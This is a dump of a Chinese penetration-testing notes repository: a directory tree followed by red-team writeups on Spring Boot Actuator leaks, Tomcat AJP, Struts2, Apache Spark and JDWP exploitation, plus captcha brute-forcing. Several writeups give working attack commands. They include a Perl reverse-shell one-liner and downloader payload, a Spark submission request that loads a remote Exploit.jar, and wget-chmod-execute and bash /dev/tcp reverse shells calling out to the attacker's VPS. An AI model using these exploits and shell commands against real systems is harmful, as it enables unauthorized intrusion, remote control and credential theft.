├── .gitignore ├── 01-案例学习 ├── APP简单逆向到getshell │ ├── APP简单逆向到getshell.html │ └── readme.md ├── Spring Boot Actuator信息泄露导致的mysql密码泄露 │ ├── pic │ │ ├── 1.png │ │ ├── 2.png │ │ └── readme.md │ └── readme.md ├── 一次CNVD-2020-10487漏洞利用 │ ├── readme.md │ └── 一次CNVD-2020-10487漏洞利用.pdf ├── 一次奇葩的任意用户登录 │ ├── readme.md │ └── 一次奇葩的任意用户登录.html ├── 一次对“攻防世界CTF”服务器的入侵尝试 │ └── readme.md ├── 安服仔某渗透项目实战 │ ├── readme.md │ └── 安服仔某渗透项目实战.html ├── 实战记一次微信小程序渗透实战记录 │ ├── readme.md │ └── 实战 _ 记一次微信小程序渗透实战记录.html ├── 当ueditor遇到创某盾.pdf ├── 某地市HVV_之_Apache Struts2打点 │ ├── pic │ │ ├── 1.png │ │ └── readme.md │ └── readme.md ├── 某大厂红队评估_之_Apache Spark打点 │ ├── Exploit.jar │ ├── pic │ │ ├── 1.png │ │ └── readme.md │ └── readme.md ├── 某大厂红队评估_之_JDWP打点 │ ├── pic │ │ ├── 1.png │ │ └── readme.md │ └── readme.md ├── 某次hw中对某虚拟主机上的靶标攻击 │ ├── readme.md │ └── 某次hw中对某虚拟主机上的靶标攻击.html ├── 某网络安全设备逻辑缺陷导致getshell │ ├── readme.md │ └── 奇安信攻防社区-某网络安全设备逻辑缺陷导致get shell.html ├── 爆破带有验证码的Web登录表单 │ ├── 爆破带有验证码的Web登录表单.md │ └── 爆破带有验证码的Web登录表单 │ │ ├── 01.png │ │ ├── 02.png │ │ ├── 03.png │ │ ├── 04.png │ │ ├── 05.png │ │ ├── 06.png │ │ ├── 07.png │ │ ├── 08.png │ │ ├── 09.png │ │ ├── 10.png │ │ └── 11.png ├── 记一次常规的Bypass 宝塔防火墙 文件上传.pdf └── 针对某集团红队Web打点突破.html ├── 02-资产收集 ├── 403绕过原理.md └── Host碰撞原理.md ├── 03-漏洞检测 ├── AWVS │ └── awvs14-scan-master │ │ ├── README.md │ │ ├── awvs14_script.py │ │ └── config.ini ├── BurpSuite下repeater中request不能识别空格 │ └── readme.md ├── BurpSuite下repeater出现中文乱码 │ └── readme.md ├── BurpSuite激活指南 │ ├── pic │ │ ├── 1.png │ │ └── readme.md │ └── readme.md ├── BurpSuite爆破时payload被url编码 │ └── readme.md ├── BurpSuite被拦截怎么办 │ ├── bp小tips-开启burp代理被拦截怎么办?.html │ └── readme.md ├── Goby红队版尝试解密 │ ├── readme.md │ └── 尝试解密goby红队版poc │ │ ├── 01.png │ │ ├── 02.png │ │ ├── 03.png │ │ ├── 04.png │ │ ├── 05.png │ │ └── 06.png ├── Nessus │ └── readme.md └── Xray │ └── readme.md ├── 04-漏洞利用 ├── 20240701-JAVA环境下SQL注入WAF绕过.md ├── 20240704-Linux下反弹Shell.md ├── ASPX WebShell免杀 │ ├── 1.aspx │ ├── ManagementClassofInvokeMethodCheckSpy.aspx │ ├── ObjectDataProviderGetTypeSpy.ashx │ ├── ObjectDataProvidertypeofSpy.ashx │ ├── XamlReaderofParseCheckSpy.aspx │ ├── dynamicCompilerSpy.aspx │ └── readme.md ├── DNSLog自建.md ├── Linux下反弹Shell.md ├── SQL注入 │ ├── MSSQL-Boolean-Blind-EXP │ │ ├── mssql-boolean-blind-exp.py │ │ └── readme.md │ ├── Oracle注入WAF绕过.md │ ├── SQLServer数据库攻击.md │ ├── SQLServer注入WAF绕过.md │ ├── mssql waf绕过检测利用 │ │ ├── pic │ │ │ ├── 0.png │ │ │ ├── 1.png │ │ │ ├── 2.png │ │ │ └── readme.md │ │ └── readme.md │ ├── mssql基本检测利用 │ │ ├── pic │ │ │ ├── 0.png │ │ │ ├── 1.png │ │ │ ├── 2.png │ │ │ ├── 3.png │ │ │ ├── 4.png │ │ │ └── readme.md │ │ └── readme.md │ ├── mysql-time-blind-kkcms-exp │ │ ├── mysql-time-blind-kkcms-exp.py │ │ └── readme.md │ ├── mysql注入waf绕过 │ │ ├── 0.png │ │ ├── 1.png │ │ ├── 2.png │ │ └── readme.md │ ├── sql注入中的dios │ │ ├── 0.png │ │ ├── 1.png │ │ ├── 2.png │ │ ├── 3.png │ │ └── readme.md │ ├── 单引号过滤绕过方式 │ │ └── readme.md │ ├── 各种语言注释总结 │ │ └── readme.md │ └── 宽字节注入特性 │ │ └── readme.md ├── SSRF漏洞WAF绕过.md ├── ThinkPHP文件写入WAF绕过 │ ├── 01.png │ ├── 02.png │ ├── 03.png │ ├── 04.png │ ├── 05.png │ └── ThinkPHP文件写入WAF绕过.md ├── WebLogic写入WebShell路径记录.md ├── XXL-JOB渗透简单记录.md ├── Yapi代码执行WAF绕过.md ├── YonYou NC路径记录.md ├── 基于楔形文字的XSS WAF绕过 │ ├── pic │ │ ├── 0.png │ │ └── readme.md │ └── readme.md ├── 明源云.md ├── 极端环境下linux文件下载.pdf ├── 符合JSPX的WebShell.md └── 通用WAF绕过 │ ├── image │ ├── 01.png │ ├── 02.png │ ├── 03.png │ ├── 04.png │ ├── 05.png │ └── 06.png │ └── readme.md ├── 06-移动端 ├── burpsuite如何对苹果手机进行抓包 │ ├── pic │ │ ├── 1.png │ │ ├── 2.png │ │ └── readme.md │ └── readme.md ├── 企业微信Secret Token利用思路 │ └── readme.md ├── 华为nova2下无需root安装Metasploit │ └── readme.md ├── 安卓端安装BurpSuite证书 │ ├── Burp Suite抓包-Android导入HTTPS - 刘奇云 - 博客园.html │ ├── Burp Suite抓包-Android导入HTTPS - 刘奇云 - 博客园_files │ │ ├── 1552062-20190930181009614-220891246.png │ │ ├── 1552062-20190930181050174-353852155.png │ │ ├── 1552062-20190930181532435-1354612174.png │ │ ├── 1552062-20190930182341419-19222429.png │ │ ├── 1552062-20190930182426538-1131763727.png │ │ ├── 1552062-20190930182446648-387901848.png │ │ ├── 1552062-20190930182502806-1217416539.png │ │ ├── 1552062-20190930182611435-303381481.png │ │ ├── 1552062-20190930182806545-1489946553.png │ │ ├── 1552062-20190930183017302-889351796.png │ │ ├── 1552062-20190930183037804-1109993841.png │ │ ├── 1552062-20190930183156784-996670706.png │ │ ├── 1552062-20190930183223310-1710195029.png │ │ ├── 1552062-20190930183239042-1593406928.png │ │ ├── 1552062-20190930183245631-1543983740.png │ │ ├── 1552062-20190930183651765-1989380630.png │ │ ├── 20160415120337.png │ │ ├── aframe.html │ │ ├── analytics.js.下载 │ │ ├── avatar-default.svg │ │ ├── blog-common.min.css │ │ ├── blog-common.min.js.下载 │ │ ├── bundle-darkgreentrip-mobile.min.css │ │ ├── bundle-darkgreentrip.min.css │ │ ├── cnblogs.css │ │ ├── container.html │ │ ├── f(1).txt │ │ ├── f(2).txt │ │ ├── f.txt │ │ ├── harmoonos-developer-competition-2.jpg │ │ ├── highlight.min.js.下载 │ │ ├── hm.js.下载 │ │ ├── icon_weibo_24.png │ │ ├── jquery-2.2.0.min.js.下载 │ │ ├── js │ │ ├── lite-mode-check.svg │ │ ├── logo.gif │ │ ├── logo.svg │ │ ├── message.svg │ │ ├── myblog.svg │ │ ├── newpost.svg │ │ ├── pubads_impl_2021120601.js.下载 │ │ ├── rx_lidar.js.下载 │ │ ├── saved_resource.html │ │ ├── search.svg │ │ ├── sodar │ │ ├── tctip.min.js.下载 │ │ └── wechat.png │ └── readme.md ├── 小米手机配置BurpSuite证书 │ └── readme.md └── 移动端抓不到包问题解决总结 │ └── readme.md ├── 07-云安全 ├── 学习K8S中常见的21种攻击方式.html ├── 知识星球分享-隐藏信息接管k8s集群.pdf └── 红队视角下的公有云基础组件安全.html └── README.md /.gitignore: -------------------------------------------------------------------------------- 1 | .DS_Store -------------------------------------------------------------------------------- /01-案例学习/APP简单逆向到getshell/readme.md: -------------------------------------------------------------------------------- 1 | # 思路梳理 2 | ``` 3 | 01、一次APP渗透,开局一个登录界面,认证调用SSO单点登录,加上长亭WAF 4 | 02、脱壳、反编译、hook绕过抓包限制,审查源码、抓包,没发现什么数据库账号密码等敏感信息 5 | 03、源码中发现新资产,shiro一把梭,写webshell碰到字符转义困难 6 | 04、fuzz后,通过base64结合^转义成功写入webshell 7 | ``` -------------------------------------------------------------------------------- /01-案例学习/Spring Boot Actuator信息泄露导致的mysql密码泄露/pic/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/pentest-hub/9c08865a027a3174463715c5da8dd30836f4a4e0/01-案例学习/Spring Boot Actuator信息泄露导致的mysql密码泄露/pic/1.png -------------------------------------------------------------------------------- /01-案例学习/Spring Boot Actuator信息泄露导致的mysql密码泄露/pic/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/pentest-hub/9c08865a027a3174463715c5da8dd30836f4a4e0/01-案例学习/Spring Boot Actuator信息泄露导致的mysql密码泄露/pic/2.png -------------------------------------------------------------------------------- /01-案例学习/Spring Boot Actuator信息泄露导致的mysql密码泄露/pic/readme.md: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /01-案例学习/Spring Boot Actuator信息泄露导致的mysql密码泄露/readme.md: -------------------------------------------------------------------------------- 1 | 如何发现Spring Boot Actuator的/env等未授权访问漏洞,可尝试发现mysql密码信息,具体如下 2 | 3 | 1、尝试下载heapdump 4 | 2、用工具Eclipse Memory Analyzer(MAT)加载文件(下载地址:https://www.eclipse.org/mat/downloads.php) 5 | 3、获取配置信息:select * from org.springframework.web.context.support.StandardServletEnvironment 6 | 4、通过字符串匹配查找用户session:select * from java.lang.String s WHERE toString(s) LIKE ".SESSION." 7 | 5、也可通过模糊搜索,寻找密码信息,如下图: 8 | ![image](./pic/1.png) 9 | ![image](./pic/2.png) 10 | -------------------------------------------------------------------------------- /01-案例学习/一次CNVD-2020-10487漏洞利用/readme.md: -------------------------------------------------------------------------------- 1 | # 思路梳理 2 | ``` 3 | 01、发现8009端口 4 | 02、经验证,存在tomcat ajp漏洞 5 | 03、目标还开放redis服务,尝试读取redis密码,redis可从外部连接,不过密码是加密过的 6 | 04、读取web.xml后,读取class文件(借助工具:https://github.com/LandGrey/ClassHound),反编译后审查加密方式,解密后成功连接redis,拿到shell 7 | 8 | 期间还有一些小坑 9 | ``` -------------------------------------------------------------------------------- /01-案例学习/一次CNVD-2020-10487漏洞利用/一次CNVD-2020-10487漏洞利用.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/pentest-hub/9c08865a027a3174463715c5da8dd30836f4a4e0/01-案例学习/一次CNVD-2020-10487漏洞利用/一次CNVD-2020-10487漏洞利用.pdf -------------------------------------------------------------------------------- /01-案例学习/一次奇葩的任意用户登录/readme.md: -------------------------------------------------------------------------------- 1 | 有一个案例是 2 | ``` 3 | 访问xxxa.xxx.com并登录后,点击个人中心发现又跳转到xxx.xxx.com登录界面,是个假登录,此时再次访问xxxa.xxx.com并再次登录后,变为真登录 4 | 5 | 原理:未知 6 | ``` 7 | 参考链接:https://mp.weixin.qq.com/s/Pg432Bd1jD2JIK6n1ipbXg 8 | -------------------------------------------------------------------------------- /01-案例学习/一次对“攻防世界CTF”服务器的入侵尝试/readme.md: -------------------------------------------------------------------------------- 1 | 以下内容纯属个人通过假想来一步一步进行的操作,纯属虚构 2 | 3 | 先说一下做远程命令执行那道题引发的linux下连接多个命令执行的总结: 4 | ;(前一个命令执行成功与否,对后一个命令无影响) 5 | ||(前一个命令失败,后一个成功,前一个成功,后一个失败) 6 | &&(前一个成功,后一个成功,前一个失败,后一个失败) 7 | |(多用于管道的符号,也能用于连接多个命令执行) 8 | &(多用于后台执行的符号,也能用于连接多个命令执行) 9 | 10 | 做远程命令执行那道题,引发了我的想入非非,忍不住尝试了一下: 11 | 目标环境:ubuntu14.04 12 | 本地测试环境:kali2019 + ubuntu16.04 13 | 当前用户:www-data 14 | 15 | 【0:希望的曙光】 16 | 寻找下载功能,执行wget -V、curl -V、ftp -h,发现都被砍掉了,再次尝试python -V还是不行,直到perl -v输出了perl的版本,看到了曙光,顺便试一下ruby -v还是不行 17 | 18 | 【1:本地测试】 19 | perl实现下载功能的代码段: 20 | ``` 21 | use LWP::Simple; 22 | $name="长春"; 23 | $url="http://192.168.1.213:8080/WellsoftTest/servlet/Httpservletwell?bz=k&name=$name&index=0"; 24 | $coont =get($url); 25 | die "not found link.." if(!defined($coont));#如果是null 26 | open $file,">t.txt" or die "couldn't open t.txt ..\n"; 27 | print $file $coont; 28 | print "print succeed...\n"; 29 | close($file); 30 | print "succeed,File is t.txt, exit....."; 31 | <> 32 | ``` 33 | 经过尝试,可以下载 34 | msfvenom生成perl的反连shell,命令如下: 35 | ``` 36 | msfvenom -p cmd/unix/reverse_perl lhost=xxxx lport=xxxx -o /var/www/html/x.pl 37 | ``` 38 | 生成的perl一行器代码如下: 39 | ``` 40 | perl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new 41 | IO::Socket::INET(PeerAddr,"192.168.xx.xx:xx");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};' 42 | ``` 43 | 执行后报错,再次执行还是报错,修改后最终形式如下: 44 | ``` 45 | use IO::Socket::INET;$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,"192.168.xx.xx:xx");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~/(.*)/){system $1;}}; 46 | ``` 47 | kali下设置好监听器,成功收到反连,OK,本地测试成功,开始对实际目标攻击 48 | 49 | 2:【实际攻击】 50 | 第一个问题就是如何生成具有下载功能的perl脚本呢?echo吧 51 | 刚输入第一条语句 52 | ``` 53 | echo use LWP::Simple; 54 | ``` 55 | 就没成功 56 | 得了,本地测试吧,经过大量测试发现,很多特殊字符都需要转义包括;、$、"、(、)、!等符号,精简后代码如下: 57 | ``` 58 | use LWP::Simple; 59 | $url="http://192.168.149.130/r.pl"; 60 | $coont=get($url); 61 | die "not found link.." if(!defined($coont)); 62 | open $file,">r.pl" or die "couldn't open t.txt ..\n"; 63 | print $file $coont; 64 | close($file); 65 | exit; 66 | <> 67 | ``` 68 | 将代码转换为一行形式,并全部转义,最终payload如下 69 | ``` 70 | echo use LWP::Simple\;\$url=\"http://supplied.6655.la/r.txt\"\;\$coont=get\(\$url\)\;die \"not found link..\" if\(\!defined\(\$coont\)\)\;open \$file,\"\>r.pl\" or die \"couldn\'t open t.txt ..\\n\"\;print \$file \$coont\;close\(\$file\)\;exit\;>d.pl 71 | ``` 72 | 执行如上语句,没成功 73 | ls -alh #发现没有写权限 74 | ls -alh / #发现当前用户在/tmp/下有写权限 75 | 执行payload,成功在/tmp/下创建下载功能的perl代码 76 | 执行perl /tmp/d.pl后,却没有下载用于反弹shell的perl脚本 77 | ifconfig发现是内网ip 78 | ping -c 2 网关>/tmp/a.txt #发现能通网关 79 | ping -c 2 www.baidu.com>/tmp/b.txt #发现不能通外部域名 80 | ping -c 2 202.98.0.68 #发现不能通外部ip 81 | 82 | 傻眼了,到此为止吧,以后再想搞的话一定要先考虑目标是否能通外网 83 | -------------------------------------------------------------------------------- /01-案例学习/安服仔某渗透项目实战/readme.md: -------------------------------------------------------------------------------- 1 | # 思路梳理 2 | ``` 3 | 01、AWVS + 人工,发现一处sql注入 4 | 02、sql注入为.net + mssql,DBA权限,直接拿到操作系统权限 5 | 03、目标没有杀软,直接提权 6 | 04、内网弱口令扫描收割一批服务器权限、ftp权限 7 | ``` -------------------------------------------------------------------------------- /01-案例学习/实战记一次微信小程序渗透实战记录/readme.md: -------------------------------------------------------------------------------- 1 | # 思路梳理 2 | ``` 3 | 01、配置环境 4 | 02、使用工具反编译得到js源码 5 | 03、审计时首选未授权接口 6 | 04、还可审计其他漏洞,如:账号密码泄露、secret和appid泄露等 7 | ``` -------------------------------------------------------------------------------- /01-案例学习/当ueditor遇到创某盾.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/pentest-hub/9c08865a027a3174463715c5da8dd30836f4a4e0/01-案例学习/当ueditor遇到创某盾.pdf -------------------------------------------------------------------------------- /01-案例学习/某地市HVV_之_Apache Struts2打点/pic/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/pentest-hub/9c08865a027a3174463715c5da8dd30836f4a4e0/01-案例学习/某地市HVV_之_Apache Struts2打点/pic/1.png -------------------------------------------------------------------------------- /01-案例学习/某地市HVV_之_Apache Struts2打点/pic/readme.md: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /01-案例学习/某地市HVV_之_Apache Struts2打点/readme.md: -------------------------------------------------------------------------------- 1 | # 0x01 打点发现 2 | 队友整理出目标全部OA系统的地址及指纹共7个,包含致远、泛微、等 3 | 对这7个OA系统进行漏洞检测,发现不存在Nday漏洞 4 | 用nmap对这7个OA系统所在ip进行全端口扫描,依次审查每个端口信息,发现其中一个端口支持put、delete方法,比较可疑,使用浏览器访问后发现是.action后缀,怀疑存在struts2漏洞 5 | # 0x02 漏洞验证 6 | 使用struts2漏洞检测工具检测,发现存在s2-045漏洞,尝试执行命令,发现返回connection reset,应该是有waf 7 | # 0x03 防护绕过 8 | 现在有2个思路,要么绕过执行命令的限制,要么上传webshell,先尝试难度相对小一些的上传webshell 9 | 尝试上传jsp格式的webshell,访问后发现403 10 | 尝试上传txt格式的文件,上传后能访问,说明可以上传文件 11 | 猜测,之前的403是因为,目标的web服务器做了限制,不能访问jsp文件 12 | 13 | 随后是一系列尝试: 14 | 上传.action格式的文件会返回到首页 15 | 上传随意后缀不能解析 16 | 当上传jspx格式的webshell时能访问,哥斯拉成功连接,如下图 17 | ![image](./pic/1.png) 18 | -------------------------------------------------------------------------------- /01-案例学习/某大厂红队评估_之_Apache Spark打点/Exploit.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/pentest-hub/9c08865a027a3174463715c5da8dd30836f4a4e0/01-案例学习/某大厂红队评估_之_Apache Spark打点/Exploit.jar -------------------------------------------------------------------------------- /01-案例学习/某大厂红队评估_之_Apache Spark打点/pic/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/pentest-hub/9c08865a027a3174463715c5da8dd30836f4a4e0/01-案例学习/某大厂红队评估_之_Apache Spark打点/pic/1.png -------------------------------------------------------------------------------- /01-案例学习/某大厂红队评估_之_Apache Spark打点/pic/readme.md: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /01-案例学习/某大厂红队评估_之_Apache Spark打点/readme.md: -------------------------------------------------------------------------------- 1 | # 0x01 打点发现 2 | 团队一起做项目,同事发现一个Apache Spark未授权页面,我这边尝试打点,遂有此文 3 | # 0x02 初次尝试 4 | 目标地址: http://182.61.xxx.xxx:8080 5 | 网上搜索针对Apache Spark的漏洞复现,用POC直接打,不出意外的攻击失败 6 | (这里记录一下:阿里云vps开启nc监听时,需要加个参数n,即nc -lnvvvp 101.200.xx.xx 8888,具体原因未知) 7 | # 0x03 本地调试 8 | 本地搭建环境,使用vulhub项目中的环境:https://github.com/vulhub/vulhub/tree/master/spark/unacc 9 | (这里记录一下:搭建环境时,发现端口被占用,netstat -antup查不到占用端口的pid和进程名,原因是权限不够,改用sudo netstat -antup可查到占用端口的pid和进程名,有时容易忽略使用sudo) 10 | 11 | 环境搭建完之后,访问:[http://192.168.202.128:8080](http://192.168.202.128:8080),能够成功访问,说明环境搭建成功 12 | 访问端口6066,能够成功访问,而目标不能访问,说明目标关闭了端口6066 13 | 当前漏洞的利用可通过2个端口:6066、7077(防守方容易忽略端口7077),且目标没关闭7077端口,又看到希望了 14 | 首先测试本地6066端口的漏洞利用,发送如下burp请求 15 | ``` 16 | POST /v1/submissions/create HTTP/1.1 17 | Host: your-ip:6066 18 | Accept-Encoding: gzip, deflate 19 | Accept: */* 20 | Accept-Language: en 21 | User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) 22 | Content-Type: application/json 23 | Connection: close 24 | Content-Length: 680 25 | 26 | { 27 | "action": "CreateSubmissionRequest", 28 | "clientSparkVersion": "2.3.1", 29 | "appArgs": [ 30 | "id_whoami,w,cat /proc/version,ifconfig,route,df -h,free -m,netstat -nltp,ps auxf" 31 | ], 32 | "appResource": "https://github.com/aRe00t/rce-over-spark/raw/master/Exploit.jar", 33 | "environmentVariables": { 34 | "SPARK_ENV_LOADED": "1" 35 | }, 36 | "mainClass": "Exploit", 37 | "sparkProperties": { 38 | "spark.jars": "https://github.com/aRe00t/rce-over-spark/raw/master/Exploit.jar", 39 | "spark.driver.supervise": "false", 40 | "spark.app.name": "Exploit", 41 | "spark.eventLog.enabled": "true", 42 | "spark.submit.deployMode": "cluster", 43 | "spark.master": "spark://your-ip:6066" 44 | } 45 | } 46 | ``` 47 | 漏洞利用失败 48 | 49 | 思考了一下,可能是目标不能访问github,导致获取不到Exploit.jar,将Exploit.jar放置到自己的vps上,修改request后,重新发送请求,成功获得响应 50 | 响应中包含driverId的值,用响应中driverId的值替换下面driverId的值,访问如下地址 51 | ``` 52 | http://192.168.202.128:8081/logPage/?driverId=driver-20211014035556-0013&logType=stdout 53 | ``` 54 | 页面会显示成功执行后的结果 55 | 56 | 测试本地7077端口的漏洞利用 57 | ``` 58 | ./spark-submit --master spark://192.168.202.128:7077 --deploy-mode cluster --class Exploit http://101.200.xx.xx:8000/Exploit.jar id 59 | ``` 60 | spark-submit下载链接:https://archive.apache.org/dist/spark/spark-2.4.3/spark-2.4.3-bin-hadoop2.7.tgz 61 | (这里记录一下:下载spark-submit时不要下载源码包,要下载二进制安装包,否则会报错) 62 | 查看执行结果还是通过上述方式,发现成功执行了命令 63 | 64 | 通过端口7077反弹shell 65 | 直接执行 66 | ``` 67 | ./spark-submit --master spark://192.168.202.128:7077 --deploy-mode cluster --class Exploit http://101.200.xx.xx:8000/Exploit.jar "bash -i >& /dev/tcp/101.200.xx.xx/8888 0>&1" 68 | ``` 69 | vps上并没有收到反弹shell 70 | 71 | 思考了一下,可能是bash反弹shell中特殊字符的问题,对payload进行base64编码,可通过此网站:http://www.jackson-t.ca/runtime-exec-payloads.html 72 | 编码后,发送请求,仍然没有收到反弹shell 73 | 74 | 继续排查,查看Exploit.jar的源代码会发现,原作者是对命令进行逗号分隔,导致base64编码后的命令被逗号分隔,如下 75 | ``` 76 | String[] cmds = args[0].split(","); 77 | 78 | bash -c {echo,YmFzaCAtaSA+JiAvZGxxxxxxxxxxxxEuMjAwLjE0NC41NS84ODg4IDA+JjE=}|{base64,-d}|{bash,-i} 79 | ``` 80 | 知道问题了,我们可以将逗号分隔改为下划线分隔,并打包为jar包,现成的jar包已经打包好,位于当前目录下 81 | (如果仔细看上面的burp请求,会发现我已经在命令之间加了一个下划线) 82 | 83 | 再次执行后成功接收到反弹shell 84 | ![image](./pic/1.png) 85 | 86 | # 0x04 参考链接: 87 | https://www.cnblogs.com/mutudou/p/14685277.html 88 | https://medium.com/@Wh0ale/apache-spark-%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E6%BC%8F%E6%B4%9E-ada9eb02af65 89 | https://github.com/vulhub/vulhub/tree/master/spark/unacc 90 | https://github.com/aRe00t/rce-over-spark/blob/master/Exploit.java 91 | -------------------------------------------------------------------------------- /01-案例学习/某大厂红队评估_之_JDWP打点/pic/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ybdt/pentest-hub/9c08865a027a3174463715c5da8dd30836f4a4e0/01-案例学习/某大厂红队评估_之_JDWP打点/pic/1.png -------------------------------------------------------------------------------- /01-案例学习/某大厂红队评估_之_JDWP打点/pic/readme.md: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /01-案例学习/某大厂红队评估_之_JDWP打点/readme.md: -------------------------------------------------------------------------------- 1 | # 0x01 打点发现 2 | nmap扫描某ip的C段,用时大概19h,对识别到的指纹信息依次查看,查看到如下信息 3 | ``` 4 | 5005/tcp open jdwp Java Debug Wire Protocol (Reference Implementation) version 1.8 1.8.0_191 5 | |_jdwp-info: ERROR: Script execution failed (use -d to debug) 6 | ``` 7 | 之前复现过JDWP的漏洞,故有此文 8 | 9 | # 0x02 简单验证 10 | telnet 106.53.xx.xx 5005 11 | 返回JDWP-Handshake,即表示存在漏洞 12 | 我这边没有返回JDWP-Handshake,不管它,继续尝试利用 13 | # 0x03 dnslog测试 14 | 1、先打个dnslog试试水 15 | POC下载地址:https://github.com/IOActive/jdwp-shellifier 16 | 执行如下命令 17 | ``` 18 | python2 jdwp-shellifier.py -t 192.168.3.118 -p 8787 --break-on "java.lang.String.indexof" --cmd "ping xx.dnslog.cn" 19 | ``` 20 | dnslog平台成功收到回显,感觉有戏 21 | # 0x04 尝试反弹shell 22 | 将如下内容保存为shell.txt,放置到vps下,并通过python3开启一个临时的http服务器 23 | ``` 24 | nc 192.168.178.129 3333 | /bin/bash | nc 192.168.178.129 4444% 25 | ``` 26 | 开启监听,需要开启2个监听,前面一个输入执行命令,后面一个输出命令执行结果 27 | ``` 28 | 这里要注意,阿里云的vps开启nc监听,需要加个选项n,否则会报错 29 | 30 | nc -lnvvp 3333 31 | nc -lnvvp 4444 32 | ``` 33 | 利用POC执行下载shell、对文件赋予可执行权限、执行shell 34 | ``` 35 | python2 jdwp-shellifier.py -t 192.168.178.128 -p 8000 --break-on "java.lang.String.indexof" --cmd "wget http://192.168.178.129:8000/shell.txt -O /tmp/shell.sh" 36 | python2 jdwp-shellifier.py -t 192.168.178.128 -p 8000 --break-on "java.lang.String.indexof" --cmd "chmod a+x /tmp/shell.sh" 37 | python2 jdwp-shellifier.py -t 192.168.178.128 -p 8000 --break-on "java.lang.String.indexof" --cmd "/tmp/shell.sh" 38 | ``` 39 | 成功执行完,vps上并没有收到反弹回来的shell 40 | 思考了一下,payload中使用nc连接vps,目标可能不存在nc,改用sh,修改shell.txt为如下 41 | ``` 42 | sh -i >& /dev/tcp/101.200.xx.xx/3333 0>&1 | /bin/sh | sh -i >& /dev/tcp/101.200.xx.xx/4444 0>&1% 43 | ``` 44 | 成功接收到反弹shell,如下图 45 | ![image](./pic/1.png) 46 | 47 | # 0x05 参考链接: 48 | https://blog.csdn.net/weixin_43486390/article/details/114259762 49 | -------------------------------------------------------------------------------- /01-案例学习/某次hw中对某虚拟主机上的靶标攻击/readme.md: -------------------------------------------------------------------------------- 1 | # 思路梳理 2 | ``` 3 | 01、ping后发现其他cname域名,怀疑是CDN,访问后发现目标为虚拟主机 4 | 02、通过备案号发现IDC服务商 5 | 03、尝试攻击IDC服务商,忘记密码处存在用户名枚举,使用目标域名作为用户名,成功进入下一步密码重置 6 | 04、在密码重置功能处发现其他域名,收集子域名发现新资产 7 | 05、在新资产中发现shiro漏洞,可直接打 8 | 06、mimikatz提取密码,远程登录,信息收集 9 | 07、最终重置了虚拟主机的密码 10 | ``` -------------------------------------------------------------------------------- /01-案例学习/某网络安全设备逻辑缺陷导致getshell/readme.md: -------------------------------------------------------------------------------- 1 | ``` 2 | 文章归纳总结(作者思路梳理): 3 | 1、通过目标公司官网获知有哪些网络安全设备产品、通过网络安全设备Web界面获知哪些设备界面简陋、通过网络空间搜索引擎获知哪些设备使用量较大,综合评定选择一款产品作为目标 4 | 2、通过互联网收集目标设备的弱口令,尝试后发现已经修复 5 | 3、通过互联网资产收集,发现一个目录遍历漏洞 6 | 4、访问php文件后会报错,不能正常读取,利用::$DATA特性,成功读取php文件 7 | 5、在/data/login.php中发现了内置的后门(不确定是恶意后门还是方便开发测试的后门) 8 | 6、进入后台,寻找无防护的上传点,成功拿到webshell 9 | ``` -------------------------------------------------------------------------------- /01-案例学习/爆破带有验证码的Web登录表单/爆破带有验证码的Web登录表单.md: -------------------------------------------------------------------------------- 1 | # 吐槽 2 | 逛github看到一个项目,讲述如何爆破带有验证码的Web登录表单,作者是基于c0ny1师傅的captcha-killer项目修改了一下,过程叙述稍微有点简陋,自己折腾了好一会,想想还是记录下使用过程,方便自己也方便他人(耗时约3小时) 3 | 4 | 本文定位教程类文章,共包括step1 - step5 5 | # step1-安装插件 6 | 下载并安装插件 7 | 下载地址:https://github.com/f0ng/captcha-killer-modified/releases 8 | 9 | # step2-插件获取图片验证码 10 | burp抓包会发现某个请求是获取图片验证码的,将这个请求发送到插件中的captcha panel 11 | ![image](./爆破带有验证码的Web登录表单/01.png) 12 | 点击captcha-killer-modified界面中的获取,发现可以正常获取验证码 13 | ![image](./爆破带有验证码的Web登录表单/02.png) 14 | 15 | # step3-本地启动验证码识别接口 16 | 此处我们使用github上的一个开源验证码识别项目,没有次数限制,识别率在80%左右 17 | ``` 18 | pip3.exe install ddddocr 19 | 20 | python3.exe .\codereg.py 21 | ``` 22 | codereg.py位于:https://github.com/f0ng/captcha-killer-modified/blob/main/codereg.py 23 | ![image](./爆破带有验证码的Web登录表单/04.png) 24 | 25 | 26 | # step4-识别验证码 27 | 点击captcha-killer-modified界面,接口URL填写启动后监听的地址 28 | ``` 29 | http://127.0.0.1:8888 30 | ``` 31 | 请求模板填如下 32 | ``` 33 | POST /reg HTTP/1.1 34 | Host: 127.0.0.1:8888 35 | Connection: close 36 | Cache-Control: max-age=0 37 | Upgrade-Insecure-Requests: 1 38 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36 39 | Sec-Fetch-Mode: navigate 40 | Sec-Fetch-User: ?1 41 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 42 | Sec-Fetch-Site: none 43 | Accept-Encoding: gzip, deflate 